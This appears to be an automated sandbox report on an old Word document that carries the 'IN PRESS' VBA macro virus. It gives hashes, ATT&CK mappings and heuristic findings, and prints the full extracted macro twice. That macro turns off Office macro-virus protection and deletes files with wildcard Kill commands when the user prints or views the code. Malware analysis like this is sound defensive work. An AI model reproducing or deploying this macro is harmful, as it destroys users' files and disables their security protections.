Office (OLE) / .DOC malware analysis — malicious · 40b0db371fcec08e

MALICIOUS

Office (OLE) / .DOC

28.0 KB Created: 2002-03-16 17:20:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14

MD5: 8bd541c09563b61ba632bc887bfdbfac SHA-1: 4a098ac76122e255d675e7ec1a323577c1b14752 SHA-256: 40b0db371fcec08e332fe2d5216242dfc4ad407fce4291a37e6e76a4b36da930

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1490 Inhibit System Recovery

The sample contains a VBA macro that attempts to disable macro protection and delete files using `Kill("*.*")`. The macro also displays messages to the user, claiming to be a virus named 'IN PRESS'. This behavior indicates a destructive intent, aiming to cause data loss and disrupt the user's system.

Heuristics 2

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1898 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1898 bytes
SHA-256: `7f7eb68e0d8f6e58b16dfe181eece9f1ef31238fb83e989e4e39124822a21881`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "INPress" Sub FilePrint() WordBasic.DisableAutoMacros 0 Options.VirusProtection = False Options.SaveNormalPrompt = False Application.EnableCancelKey = wdCancelDisabled On Errore GoTo ErrorFS adoc = Dir(".") While adoc <> "" Kill (adoc) MsgBox "' " + adoc + " ' has been erased !", vbInformation, "IN PRESS" adoc = Dir() Wend Assistant.Visible = True With Assistant.NewBalloon .Button = msoButtonSetOK .Heading = "Virus IN PRESS" .Text = "Ooops ! I have erased your documents .. I have to quit now . Bye bye and sweet dreams !!!" .Show End With Application.Quit ErrorFS: End Sub Sub ToolsMacro() Application.EnableCancelKey = wdCancelDisabled WordBasic.DisableAutoMacros 0 Options.VirusProtection = False Options.SaveNormalPrompt = False On Error GoTo ErrorTM MsgBox "Sorry but you have been infected by IN PRESS !", vbInformation, "IN PRESS" ErrorTM: End Sub Sub ViewVBCode() Application.EnableCancelKey = wdCancelDisabled WordBasic.DisableAutoMacros 0 Options.VirusProtection = False Options.SaveNormalPrompt = False On Error GoTo ErrorVVBC Assistant.Visible = True With Assistant.NewBalloon .Button = msoButtonSetOK .Heading = "Virus IN PRESS" .Text = "Why did you want to see my source ? You have done a bad thing !!" .Show End With Kill "\." Kill "." Assistant.Visible = True With Assistant.NewBalloon .Button = msoButtonSetOK .Heading = "Virus IN PRESS" .Text = "I have erased your files to punish your!" .Show End With ErrorVVBC: End Sub

SHA-256: 7f7eb68e0d8f6e58b16dfe181eece9f1ef31238fb83e989e4e39124822a21881

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "INPress"
Sub FilePrint()
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.EnableCancelKey = wdCancelDisabled
On Errore GoTo ErrorFS

adoc = Dir("*.*")
While adoc <> ""
    Kill (adoc)
    MsgBox "' " + adoc + " ' has been erased !", vbInformation, "IN PRESS"
    adoc = Dir()
Wend
Assistant.Visible = True
With Assistant.NewBalloon
    .Button = msoButtonSetOK
    .Heading = "Virus IN PRESS"
    .Text = "Ooops ! I have erased your documents .. I have to quit now . Bye bye and sweet dreams !!!"
    .Show
End With

Application.Quit

ErrorFS:

End Sub

Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorTM
    MsgBox "Sorry but you have been infected by IN PRESS !", vbInformation, "IN PRESS"
ErrorTM:

End Sub

Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
Assistant.Visible = True
With Assistant.NewBalloon
    .Button = msoButtonSetOK
    .Heading = "Virus IN PRESS"
    .Text = "Why did you want to see my source ? You have done a bad thing !!"
    .Show
End With
Kill "\*.*"
Kill "*.*"

Assistant.Visible = True
With Assistant.NewBalloon
    .Button = msoButtonSetOK
    .Heading = "Virus IN PRESS"
    .Text = "I have erased your files to punish your!"
    .Show
End With

ErrorVVBC:
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.